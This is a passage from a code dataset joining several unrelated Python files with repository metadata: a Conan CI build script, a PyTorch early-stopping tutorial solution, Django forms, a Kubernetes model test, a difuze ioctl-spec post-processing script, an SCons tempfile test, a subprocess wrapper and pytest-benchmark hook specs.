'YYYY-MM-DD HH24:MI:SSOF',
'YYYY-MM-DD HH:MI:SS']:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'datetimeformattz', hints)
quiet_remove(unhandled_hints, 'datetimeformattz')
if hints.timeonlyformat in ['HH24:MI:SS', 'HH:MI:SS']:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'timeonlyformat', hints)
quiet_remove(unhandled_hints, 'timeonlyformat')
# No options to change this. Tested with unix newlines, dos
# newlines and mac newlines and all were understood.:
if hints.record_terminator in ['\n', '\r\n', '\r', None]:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'record-terminator', hints)
quiet_remove(unhandled_hints, 'record-terminator')
# No way to flag compression, but tested uncompressed, with
# gzip and works great. .bz2 gives "400 Unsupported
# compression type". Not sure about .lzo, but pandas can't
# handle it regardless, so doubt it's handled.
if hints.compression is None or hints.compression == 'GZIP':
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'compression', hints)
quiet_remove(unhandled_hints, 'compression')
| 42.014006 | 125 | 0.688246 |
b6a324f2c022792d45551fdca822f6e706869066 | 862 | py | Python | .ci/build.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | null | null | null | .ci/build.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | null | null | null | .ci/build.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import subprocess
import sys
import conanfile
def run_conan(args):
cmd = ["conan"] + args
print("running: %s" % " ".join(cmd))
sys.stdout.flush()
subprocess.check_call(cmd)
def build(argv):
props = conanfile.Properties()
run_conan(["create", ".", props.conan_ref] + argv)
archived_channels = props.archived_channels
if props.conan_channel in archived_channels:
run_conan(
["upload", props.conan_recipe, "--all", "--remote", "gitlab"]
)
else:
print(
"Conan channel not archived. Update archived_branches in "
"conanfile.py to get archival."
)
print("archived channels: ")
print(*archived_channels, sep=", ")
print("channel built: " + props.conan_channel)
if __name__ == "__main__":
build(sys.argv[1:])
| 24.628571 | 73 | 0.611369 |
36176a4369f6963b7bf80bfb16357a82b77c14c5 | 1,678 | py | Python | tutorials/W1D5_Regularization/solutions/W1D5_Tutorial1_Solution_23bb8e1a.py | carsen-stringer/course-content-dl | 27749aec56a3d2a43b3890483675ad0338a2680f | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | tutorials/W1D5_Regularization/solutions/W1D5_Tutorial1_Solution_23bb8e1a.py | carsen-stringer/course-content-dl | 27749aec56a3d2a43b3890483675ad0338a2680f | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | tutorials/W1D5_Regularization/solutions/W1D5_Tutorial1_Solution_23bb8e1a.py | carsen-stringer/course-content-dl | 27749aec56a3d2a43b3890483675ad0338a2680f | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | def early_stopping_main(args, model, train_loader, val_loader):
device = args['device']
model = model.to(device)
optimizer = optim.SGD(model.parameters(),
lr=args['lr'],
momentum=args['momentum'])
best_acc = 0.0
best_epoch = 0
# Number of successive epochs that you want to wait before stopping training process
patience = 20
# Keps track of number of epochs during which the val_acc was less than best_acc
wait = 0
val_acc_list, train_acc_list = [], []
for epoch in tqdm(range(args['epochs'])):
# train the model
train(args, model, train_loader, optimizer)
# calculate training accuracy
train_acc = test(model, train_loader, device=device)
# calculate validation accuracy
val_acc = test(model, val_loader, device=device)
if (val_acc > best_acc):
best_acc = val_acc
best_epoch = epoch
best_model = copy.deepcopy(model)
wait = 0
else:
wait += 1
if (wait > patience):
print(f'early stopped on epoch: {epoch}')
break
train_acc_list.append(train_acc)
val_acc_list.append(val_acc)
return val_acc_list, train_acc_list, best_model, best_epoch
# Set the arguments
args = {
'epochs': 200,
'lr': 5e-4,
'momentum': 0.99,
'device': DEVICE
}
# Initialize the model
set_seed(seed=SEED)
model = AnimalNet()
## Uncomment to test
val_acc_earlystop, train_acc_earlystop, _, best_epoch = early_stopping_main(args, model, train_loader, val_loader)
print(f'Maximum Validation Accuracy is reached at epoch: {best_epoch:2d}')
with plt.xkcd():
early_stop_plot(train_acc_earlystop, val_acc_earlystop, best_epoch) | 26.634921 | 114 | 0.681168 |
253d8b9c58af2cb1bb477071172967e4472a9d69 | 540 | py | Python | tests/core/forms.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 2,020 | 2015-05-20T02:41:40.000Z | 2022-03-31T14:37:50.000Z | tests/core/forms.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 1,195 | 2015-05-19T15:28:11.000Z | 2022-03-31T16:56:16.000Z | tests/core/forms.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 680 | 2015-05-27T16:54:17.000Z | 2022-03-31T07:56:09.000Z | from django import forms
from import_export.forms import ConfirmImportForm, ImportForm
from .models import Author
class AuthorFormMixin(forms.Form):
author = forms.ModelChoiceField(queryset=Author.objects.all(),
required=True)
class CustomImportForm(AuthorFormMixin, ImportForm):
"""Customized ImportForm, with author field required"""
pass
class CustomConfirmImportForm(AuthorFormMixin, ConfirmImportForm):
"""Customized ConfirmImportForm, with author field required"""
pass
| 25.714286 | 66 | 0.735185 |
f5dfffa725c9ba0ee03eba0f70794b0e30ed402c | 2,379 | py | Python | kubernetes/test/test_com_coreos_monitoring_v1_prometheus_spec_probe_selector.py | mariusgheorghies/python | 68ac7e168963d8b5a81dc493b1973d29e903a15b | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_com_coreos_monitoring_v1_prometheus_spec_probe_selector.py | mariusgheorghies/python | 68ac7e168963d8b5a81dc493b1973d29e903a15b | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_com_coreos_monitoring_v1_prometheus_spec_probe_selector.py | mariusgheorghies/python | 68ac7e168963d8b5a81dc493b1973d29e903a15b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import kubernetes.client
from kubernetes.client.models.com_coreos_monitoring_v1_prometheus_spec_probe_selector import ComCoreosMonitoringV1PrometheusSpecProbeSelector # noqa: E501
from kubernetes.client.rest import ApiException
class TestComCoreosMonitoringV1PrometheusSpecProbeSelector(unittest.TestCase):
"""ComCoreosMonitoringV1PrometheusSpecProbeSelector unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test ComCoreosMonitoringV1PrometheusSpecProbeSelector
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = kubernetes.client.models.com_coreos_monitoring_v1_prometheus_spec_probe_selector.ComCoreosMonitoringV1PrometheusSpecProbeSelector() # noqa: E501
if include_optional :
return ComCoreosMonitoringV1PrometheusSpecProbeSelector(
match_expressions = [
kubernetes.client.models.com_coreos_monitoring_v1_alertmanager_spec_affinity_pod_affinity_pod_affinity_term_label_selector_match_expressions.com_coreos_monitoring_v1_Alertmanager_spec_affinity_podAffinity_podAffinityTerm_labelSelector_matchExpressions(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}
)
else :
return ComCoreosMonitoringV1PrometheusSpecProbeSelector(
)
def testComCoreosMonitoringV1PrometheusSpecProbeSelector(self):
"""Test ComCoreosMonitoringV1PrometheusSpecProbeSelector"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 37.761905 | 272 | 0.691047 |
2f041687f12514d436d8dca0080a7a268ffff4a1 | 16,727 | py | Python | helper_scripts/post_processing/run_all.py | chubbymaggie/difuze | f5074953014eec98954c4b50cb0db33ebd00d29e | [
"BSD-2-Clause"
] | 21 | 2018-05-28T03:08:40.000Z | 2021-12-16T09:50:48.000Z | helper_scripts/post_processing/run_all.py | JackBro/difuze | 964c8051a3bc6b04319cdc715303bb57e9e453d1 | [
"BSD-2-Clause"
] | 4 | 2019-04-23T10:14:14.000Z | 2020-05-07T08:41:00.000Z | helper_scripts/post_processing/run_all.py | JackBro/difuze | 964c8051a3bc6b04319cdc715303bb57e9e453d1 | [
"BSD-2-Clause"
] | 6 | 2018-10-25T05:04:09.000Z | 2020-12-01T08:28:25.000Z | import sys
import os
import glob
import subprocess
import md5
import argparse
out_dir = 'out/'
xml_dir = 'xml/'
generics_dir = 'generics/'
commons_dir = 'common/'
class Struct(object):
def __init__(self):
self.vals = []
def __getitem__(self, idx):
return self.vals[idx]
def add_val(self, val):
self.vals.append(val)
class Union(object):
def __init__(self):
self.vals = []
def __getitem__(self, idx):
return self.vals[idx]
def add_val(self, val):
self.vals.append(val)
def my_listdir(path):
return glob.glob(os.path.join(path, '*'))
def get_devpath(fname):
marker = 'Device name finder'
hit = 'Device Name'
i = 0
f = open(fname, 'r')
data = f.read()
f.close()
lines = data.splitlines()
for line in lines:
if marker in line:
return None
elif hit in line:
name = line[line.rfind(' ')+1::]
type_line = lines[i+1]
dev_type = type_line[type_line.rfind(' ')+1::]
if dev_type == 'proc':
dev_loc = dev_type
else:
dev_loc = '/dev/'
dev_loc += name
return dev_loc
i += 1
print "Something is weird about the ioctl out file.."
import ipdb;ipdb.set_trace()
return None
def get_struct_name(line):
struct_name = line[line.find('.')+1:line.find('=')-1]
return struct_name
def get_cmd_val(line):
val_str = line[line.find(':')+1:line.rfind(':')]
if 'BR' in line:
first,second = val_str.split(',')
if first == second:
val_str = first
# TODO: Check with machiry
else:
val_str = second
try:
val = int(val_str)
val = abs(val)
except ValueError:
print "Bad val_str: %s" % val_str
import ipdb;ipdb.set_trace()
sys.exit(1)
return val
def emit_records_popping_cmd(popd_cmd, cmd_stack, records, global_type):
# check if we have a record for our cmd, if so, just return
for record in records:
cmd = record[0]
if popd_cmd == cmd:
return
# if not, check our parents records
parent_had_record = False
for parent in cmd_stack[:-1:]:
parent_records = []
parent_had_record = False
for record in records:
cmd = record[0]
arg = record[1]
if cmd == parent:
parent_had_record = True
new_record = [popd_cmd, arg]
records.append(new_record)
if parent_had_record:
break
# last hope, check global type
if parent_had_record == False:
if global_type is None:
return
print '[*] Using global type! %s' % global_type
new_record = [popd_cmd,global_type]
records.append(new_record)
return
def emit_records_saw_type(cmd_stack, cmd_type, records):
new_record = [cmd_stack[-1], cmd_type]
records.append(new_record)
return
# get preprocessed files. Also serves as a precheck..
def get_pre_procs(lines):
# first get the start idx
idx = 0
for line in lines:
if 'ALL PREPROCESSED FILES' in line:
break
idx += 1
if idx == len(lines):
print "[!] Couldn't find preprocessed files!"
return -1
if 'Preprocessed' not in lines[idx-1]:
return -1
main_pre_proc = lines[idx-1][lines[idx-1].find(":")+1::]
additional_pre_procs = []
for line in lines[idx+1:-2:]:
additional_pre_procs.append(line[line.find(":")+1::])
if main_pre_proc in additional_pre_procs:
additional_pre_procs.remove(main_pre_proc)
to_ret = [main_pre_proc]
to_ret.extend(additional_pre_procs)
return to_ret
def algo(fname):
records = []
cmd_stack = []
global_type = None
cur_cmd = None
cur_type = None
in_type = False
in_anon_type = False
f = open(fname, 'r')
data = f.read()
f.close()
lines = data.splitlines()
print '[+] Running on file %s' % fname
name_line = lines[1]
ioctl_name = name_line[name_line.find(': ')+2::]
print '[+] ioctl name: %s' % ioctl_name
pre_proc_files = get_pre_procs(lines)
if pre_proc_files == -1:
print "[*] Failed precheck"
return records, [], ioctl_name
# probably an uncessary sanity check
if len(pre_proc_files) == 0:
print "[*] Failed to find preproc files"
import ipdb;ipdb.set_trace()
for line in lines:
if 'Found Cmd' in line:
cmd_val = get_cmd_val(line)
if 'START' in line:
cmd_stack.append(cmd_val)
cur_cmd = cmd_val
elif 'END' in line:
# the cmd val that's END'ing should always be the top guy on the stack
if cmd_val != cmd_stack[-1]:
print "Fucked up cmd stack state!"
import ipdb;ipdb.set_trace()
popd_cmd = cmd_stack.pop()
emit_records_popping_cmd(popd_cmd, cmd_stack, records, global_type)
cur_cmd = None
elif 'STARTTYPE' in line:
in_type = True
# just saw a type, so time to emit a record
elif 'ENDTYPE' in line:
# THIS IS POSSIBLE -- IF THE COPY_FROM_USER IS ABOVE THE SWITCH.
if cur_cmd is None:
# push
# Fuck....global anon
print 'Setting global type'
global_type = cur_type
in_type = False
cur_type = None
continue
if cur_type is None:
print 'wtf. cur_type is None..'
import ipdb;ipdb.set_trace()
emit_records_saw_type(cmd_stack, cur_type, records)
in_type = False
cur_type = None
elif in_type:
# check if the type is a fuggin anon guy
if 'anon' in line and 'STARTELEMENTS' in line:
in_anon_type = True
if 'struct' in line:
cur_type = Struct()
elif 'union' in line:
cur_type = Union()
else:
print "Unknown anon type! %s" % line
import ipdb;ipdb.set_trace()
elif 'anon' in line and 'ENDELEMENTS' in line:
in_anon_type = False
pass
elif in_anon_type:
cur_type.add_val(line.strip())
else:
cur_type = line
return records, pre_proc_files, ioctl_name
def get_relevant_preproc(struct_name, pre_procs, folder_name):
found = False
# a horrible hack..
for pre in pre_procs:
stuff = subprocess.Popen(['grep', struct_name, pre], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = stuff.communicate()
if len(stdout) > 0:
found = True
break
if found == False:
return -1
# /home/jay/ioctl_stuff/llvm_out_new/drivers/hisi/tzdriver/tc_client_driver.preprocessed
pre_fname = pre[pre.rfind('/')+1:pre.rfind('.'):]
# check if we've parsed the found file
path = out_dir + folder_name + '/' + xml_dir
abs_path = os.path.abspath(path)
potential_outfile = abs_path + '/' + pre_fname + '_out.xml'
if os.path.exists(potential_outfile):
return potential_outfile
else:
print '[@] Setting up a new out file: %s' % pre_fname
return setup_files(pre, folder_name)
def setup_files(pre_proc, folder_name):
out = out_dir + folder_name + '/' + xml_dir
# yeah yeah, this is pretty stupid but it's a simple unique check since there may be filename collisions
md5_sum = md5.new(pre_proc).digest().encode('hex')
output_base_name = pre_proc[pre_proc.rfind('/')+1:pre_proc.rfind('.'):]
# make sure the xml file exists
xml_out_path = os.path.abspath(out)
if os.path.exists(xml_out_path) == False:
os.mkdir(xml_out_path)
# first check the commons file
if os.path.exists(out_dir + '/' + commons_dir + output_base_name + '_' + md5_sum + '_out.xml') == True:
print '[+] Found a match in commons!'
return out_dir + commons_dir + output_base_name + '_' + md5_sum + '_out.xml'
# create the c2xml file
c2xml_cmd = './c2xml ' + pre_proc + ' > ' + out + output_base_name + '.xml'
print c2xml_cmd
os.system(c2xml_cmd)
# pre_parse the file
pre_parse_cmd = 'python pre_parse.py ' + out + output_base_name + '.xml'
print pre_parse_cmd
os.system(pre_parse_cmd)
# parse the file
parse_cmd = 'python parse.py ' + out + output_base_name + '_fixup.xml > ' + out + output_base_name + '_out.xml'
print parse_cmd
os.system(parse_cmd)
out_file = out + output_base_name + '_out.xml'
# cp it to the commons guy
cp_cmd = 'cp ' + out_file + ' ' + out_dir + '/' + commons_dir + output_base_name + '_' + md5_sum + '_out.xml'
print cp_cmd
os.system(cp_cmd)
return out_file
# TODO: This is slow and stupid, fix it
def pre_check(records):
for record in records:
cmd_type = record[1]
if type(cmd_type) is str:
if 'struct' in cmd_type or cmd_type in ['i16','i32','i64']:
return True
return False
def is_array(cmd_type):
if '[' in cmd_type and 'x' in cmd_type and ']' in cmd_type:
return True
else:
return False
def process_records(records, pre_procs, folder_name, device_name, dev_num):
i = 0
for record in records:
cmd = record[0]
cmd_type = record[1]
file_name = folder_name + '_' + str(i) + '_' + str(cmd) + device_name.replace('/','-') + '.xml'
# just accept normal structs for now
if type(cmd_type) is str:
# normal structs
if 'struct' in cmd_type:
struct_name = get_struct_name(cmd_type)
out_file = get_relevant_preproc(struct_name, pre_procs, folder_name)
if out_file == -1:
print "[&] Couldn't find relevant out file!"
import ipdb;ipdb.set_trace()
# post_parse command
post_parse_cmd = 'python post_parse.py ' + out_file + ' ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name
full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name)
print post_parse_cmd
os.system(post_parse_cmd)
# check if we fucked up
if os.path.getsize(full_out_file) == 0:
print '[-] Created 0 size file! Removing!'
os.remove(full_out_file)
# generics
elif cmd_type in ['i16', 'i32', 'i64']:
struct_name = 'foo'
post_parse_cmd = 'python post_parse.py ' + generics_dir + 'generic_' + cmd_type + '.xml ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name
full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name)
print post_parse_cmd
os.system(post_parse_cmd)
# array
elif is_array(cmd_type):
struct_name = 'foo'
file_name = folder_name + '_' + str(i) + '_arr' + device_name.replace('/','-') + '.xml'
post_parse_cmd = 'python post_parse.py ' + generics_dir + 'generic_arr.xml ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name
full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name)
print post_parse_cmd
os.system(post_parse_cmd)
# TODO: we need to create a custom header with either a union or struct
else:
pass
i+=1
def main():
global out_dir
parser = argparse.ArgumentParser(description="run_all options")
parser.add_argument('-f', type=str, help="Filename of the ioctl analysis output OR the entire output directory created by the system", required=True)
parser.add_argument('-o', type=str, help="Output directory to store the results. If this directory does not exist it will be created", required=True)
parser.add_argument('-n', type=str, help="Specify devname options. You can choose manual (specify every name manually), auto (skip anything that we don't identify a name for), or hybrid (if we detected a name, we use it, else we ask the user)", default="manual", choices=['manual', 'auto', 'hybrid'])
parser.add_argument('-m', type=int, help="Enable multi-device output most ioctls only have one applicable device node, but some may have multiple. (0 to disable)", default=1)
args = parser.parse_args()
path = args.f
out_dir = args.o
name_mode = args.n
multi_dev = args.m
if out_dir[-1] != '/':
out_dir = out_dir + '/'
if os.path.exists(os.path.abspath(out_dir)) == False:
print "[+] Creating your out directory for you"
os.mkdir(os.path.abspath(out_dir))
if os.path.isfile(path) == False:
files = my_listdir(path)
else:
files = [path]
if os.path.exists(out_dir + commons_dir) == False:
os.mkdir(out_dir + commons_dir)
print "[+] About to run on %d ioctl info file(s)" % len(files)
processed_files = []
algo_dict = {}
for fname in files:
if fname == "common":
continue
if os.path.isdir(fname):
print "[^] Hit the V4L2 guy!"
continue
# Really we just need the preprocessed file at this point
records, pre_proc_files, ioctl_name = algo(fname)
if len(records) > 0:
cwd = os.path.abspath('.')
# check if device path exists
if os.path.exists(cwd + '/' + out_dir + ioctl_name) == False:
os.mkdir(out_dir + ioctl_name)
else:
print "[!] Skipping %s. out file exists" % ioctl_name
continue
# run a pre_check to make sure we have struct or generic args
if pre_check(records) == False:
print '[!] Skipping %s. No struct or generic args.' % ioctl_name
continue
# if we're running in full automode, make sure the device name has been recovered
if name_mode == 'auto':
dev_path = get_devpath(fname)
if dev_path == None:
print '[!] Skipping %s. Name was not recovered and running in auto mode.' % ioctl_name
continue
# setup files. This is done once per device/ioctl
for record in records:
struct_type = record[1]
# nothing to process for generics
if 'struct' not in struct_type:
continue
get_relevant_preproc(get_struct_name(struct_type), pre_proc_files, ioctl_name)
#out_file = setup_files(pre_proc_files[0], ioctl_name)
processed_files.append(fname)
algo_dict[fname] = (records, pre_proc_files, ioctl_name)
else:
print '[!] Skipping %s. No commands found' % ioctl_name
# pass #2
for fname in processed_files:
# parse the output
records = algo_dict[fname][0]
pre_proc_files = algo_dict[fname][1]
ioctl_name = algo_dict[fname][2]
# good to go
print '[#] Operating on: %s' % fname
num_devs = 1
if multi_dev:
print "Multiple Devices? (y/n):"
multi_dev = raw_input("> ")
if multi_dev == 'y':
num = raw_input("num devices: ")
num_devs = int(num)
for x in range(num_devs):
# if we're running in manual mode, ask for the device name regardless
if name_mode == 'manual':
print "Please enter a device name:"
device_name = raw_input("> ")
else:
# if we're in auto mode and we've reached here, the name must exist
# so no need to distinguish between auto and hybrid
device_name = get_devpath(fname)
if device_name == None:
print "Please enter a device name:"
device_name = raw_input("> ")
process_records(records, pre_proc_files, ioctl_name, device_name, x)
if __name__ == '__main__':
main()
| 33.655936 | 304 | 0.569857 |
a19317db99ecc5656366838a3d6783e33daac5b5 | 3,059 | py | Python | test/TempFileMunge/TEMPFILESUFFIX.py | janem-msu/scons | 40f815f687b93afa6ef4deb7293a26e869402cca | [
"MIT"
] | null | null | null | test/TempFileMunge/TEMPFILESUFFIX.py | janem-msu/scons | 40f815f687b93afa6ef4deb7293a26e869402cca | [
"MIT"
] | null | null | null | test/TempFileMunge/TEMPFILESUFFIX.py | janem-msu/scons | 40f815f687b93afa6ef4deb7293a26e869402cca | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Verify that setting the $TEMPFILESUFFIX variable will cause
it to appear at the end of name of the generated tempfile
used for long command lines.
"""
import os
import stat
import TestSCons
test = TestSCons.TestSCons(match=TestSCons.match_re)
test.write('SConstruct', """
import os
env = Environment(
BUILDCOM = '${TEMPFILE("xxx.py $TARGET $SOURCES")}',
MAXLINELENGTH = 16,
TEMPFILESUFFIX = '.foo',
)
env.AppendENVPath('PATH', os.curdir)
env.Command('foo.out', 'foo.in', '$BUILDCOM')
""")
test.write('foo.in', "foo.in\n")
test.run(arguments = '-n -Q .',
stdout = """\
Using tempfile \\S+ for command line:
xxx.py foo.out foo.in
xxx.py \\S+
""")
test.write('SConstruct', """
import os
def print_cmd_line(s, targets, sources, env):
pass
env = Environment(
BUILDCOM = '${TEMPFILE("xxx.py $TARGET $SOURCES")}',
MAXLINELENGTH = 16,
TEMPFILESUFFIX = '.foo',
PRINT_CMD_LINE_FUNC=print_cmd_line
)
env.AppendENVPath('PATH', os.curdir)
env.Command('foo.out', 'foo.in', '$BUILDCOM')
""")
test.run(arguments = '-n -Q .',
stdout = """""")
test.write('SConstruct', """
import os
from SCons.Platform import TempFileMunge
class TestTempFileMunge(TempFileMunge):
def __init__(self, cmd, cmdstr = None):
super(TestTempFileMunge, self).__init__(cmd, cmdstr)
def _print_cmd_str(self, target, source, env, cmdstr):
super(TestTempFileMunge, self)._print_cmd_str(target, source, None, cmdstr)
env = Environment(
TEMPFILE = TestTempFileMunge,
BUILDCOM = '${TEMPFILE("xxx.py $TARGET $SOURCES")}',
MAXLINELENGTH = 16,
TEMPFILESUFFIX = '.foo',
)
env.AppendENVPath('PATH', os.curdir)
env.Command('foo.out', 'foo.in', '$BUILDCOM')
""")
test.run(arguments = '-n -Q .',
stdout = """\
Using tempfile \\S+ for command line:
xxx.py foo.out foo.in
xxx.py \\S+
""")
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 27.558559 | 83 | 0.704479 |
bf61decc4a7117550ca0e7b3ed0a2a9cf1b70c6a | 3,167 | py | Python | seqcluster/libs/do.py | lpantano/seqcluster | e4ef3581e6a16a31ae1f3d2bb5a83bef3ed84e26 | [
"MIT"
] | 33 | 2015-01-26T23:18:01.000Z | 2022-01-07T21:40:49.000Z | seqcluster/libs/do.py | lpantano/seqcluster | e4ef3581e6a16a31ae1f3d2bb5a83bef3ed84e26 | [
"MIT"
] | 44 | 2015-01-21T17:43:42.000Z | 2021-08-25T15:49:18.000Z | seqcluster/libs/do.py | lpantano/seqcluster | e4ef3581e6a16a31ae1f3d2bb5a83bef3ed84e26 | [
"MIT"
] | 18 | 2015-05-18T15:34:32.000Z | 2021-02-10T17:58:24.000Z | """Centralize running of external commands, providing logging and tracking. Integrated from bcbio package with some changes.
"""
import collections
import os
import subprocess
import logging
try:
basestring
except NameError:
basestring = str
logger = logging.getLogger("run")
def run(cmd, data=None, checks=None, region=None, log_error=True,
log_stdout=False):
"""Run the provided command, logging details and checking for errors.
"""
try:
logger.debug(" ".join(str(x) for x in cmd) if not isinstance(cmd, basestring) else cmd)
_do_run(cmd, checks, log_stdout)
except:
if log_error:
logger.info("error at command")
raise
def find_bash():
for test_bash in [find_cmd("bash"), "/bin/bash", "/usr/bin/bash", "/usr/local/bin/bash"]:
if test_bash and os.path.exists(test_bash):
return test_bash
raise IOError("Could not find bash in any standard location. Needed for unix pipes")
def find_cmd(cmd):
try:
return subprocess.check_output(["which", cmd]).strip()
except subprocess.CalledProcessError:
return None
def _normalize_cmd_args(cmd):
"""Normalize subprocess arguments to handle list commands, string and pipes.
Piped commands set pipefail and require use of bash to help with debugging
intermediate errors.
"""
if isinstance(cmd, basestring):
# check for standard or anonymous named pipes
if cmd.find(" | ") > 0 or cmd.find(">(") or cmd.find("<("):
return "set -o pipefail; " + cmd, True, find_bash()
else:
return cmd, True, None
else:
return [str(x) for x in cmd], False, None
def _do_run(cmd, checks, log_stdout=False):
"""Perform running and check results, raising errors for issues.
"""
cmd, shell_arg, executable_arg = _normalize_cmd_args(cmd)
s = subprocess.Popen(cmd, shell=shell_arg, executable=executable_arg,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=True)
debug_stdout = collections.deque(maxlen=100)
while 1:
line = s.stdout.readline()
if line:
debug_stdout.append(line)
if log_stdout:
logger.debug(line.rstrip())
else:
logger.debug(line.rstrip())
exitcode = s.poll()
if exitcode is not None:
for line in s.stdout:
debug_stdout.append(line)
if exitcode is not None and exitcode != 0:
error_msg = " ".join(cmd) if not isinstance(cmd, basestring) else cmd
error_msg += "\n"
error_msg += "".join(bytes_out.decode('utf-8') for bytes_out in debug_stdout)
s.communicate()
s.stdout.close()
raise subprocess.CalledProcessError(exitcode, error_msg)
else:
break
s.communicate()
s.stdout.close()
# Check for problems not identified by shell return codes
if checks:
for check in checks:
if not check():
raise IOError("External command failed")
| 35.188889 | 124 | 0.615093 |
2482645bfe0b53a3d77a3944d0becb58a07dd6fe | 4,156 | py | Python | src/pytest_benchmark/hookspec.py | Ekultek/pytest-benchmark | cdfab1379b64fea7fa28cb868d768606e10cede2 | [
"BSD-2-Clause"
] | null | null | null | src/pytest_benchmark/hookspec.py | Ekultek/pytest-benchmark | cdfab1379b64fea7fa28cb868d768606e10cede2 | [
"BSD-2-Clause"
] | null | null | null | src/pytest_benchmark/hookspec.py | Ekultek/pytest-benchmark | cdfab1379b64fea7fa28cb868d768606e10cede2 | [
"BSD-2-Clause"
] | 1 | 2021-04-22T08:54:07.000Z | 2021-04-22T08:54:07.000Z | def pytest_benchmark_generate_machine_info(config):
"""
To completely replace the generated machine_info do something like this:
.. sourcecode:: python
def pytest_benchmark_update_machine_info(config):
return {'user': getpass.getuser()}
"""
pass
def pytest_benchmark_update_machine_info(config, info):
"""
If benchmarks are compared and machine_info is different then warnings will be shown.
To add the current user to the commit info override the hook in your conftest.py like this:
.. sourcecode:: python
def pytest_benchmark_update_machine_info(config, info):
info['user'] = getpass.getuser()
"""
pass
def pytest_benchmark_generate_commit_info(config):
"""
To completely replace the generated commit_info do something like this:
.. sourcecode:: python
def pytest_benchmark_generate_commit_info(config):
return {'id': subprocess.check_output(['svnversion']).strip()}
"""
pass
def pytest_benchmark_update_commit_info(config, info):
"""
To add something into the commit_info, like the commit message do something like this:
.. sourcecode:: python
def pytest_benchmark_update_commit_info(config, info):
info['message'] = subprocess.check_output(['git', 'log', '-1', '--pretty=%B']).strip()
"""
pass
def pytest_benchmark_group_stats(config, benchmarks, group_by):
"""
You may perform grouping customization here, in case the builtin grouping doesn't suit you.
Example:
.. sourcecode:: python
@pytest.mark.hookwrapper
def pytest_benchmark_group_stats(config, benchmarks, group_by):
outcome = yield
if group_by == "special": # when you use --benchmark-group-by=special
result = defaultdict(list)
for bench in benchmarks:
# `bench.special` doesn't exist, replace with whatever you need
result[bench.special].append(bench)
outcome.force_result(result.items())
"""
pass
def pytest_benchmark_generate_json(config, benchmarks, include_data, machine_info, commit_info):
"""
You should read pytest-benchmark's code if you really need to wholly customize the json.
.. warning::
Improperly customizing this may cause breakage if ``--benchmark-compare`` or ``--benchmark-histogram`` are used.
By default, ``pytest_benchmark_generate_json`` strips benchmarks that have errors from the output. To prevent this,
implement the hook like this:
.. sourcecode:: python
@pytest.mark.hookwrapper
def pytest_benchmark_generate_json(config, benchmarks, include_data, machine_info, commit_info):
for bench in benchmarks:
bench.has_error = False
yield
"""
pass
def pytest_benchmark_update_json(config, benchmarks, output_json):
"""
Use this to add custom fields in the output JSON.
Example:
.. sourcecode:: python
def pytest_benchmark_update_json(config, benchmarks, output_json):
output_json['foo'] = 'bar'
"""
pass
def pytest_benchmark_compare_machine_info(config, benchmarksession, machine_info, compared_benchmark):
"""
You may want to use this hook to implement custom checks or abort execution.
``pytest-benchmark`` builtin hook does this:
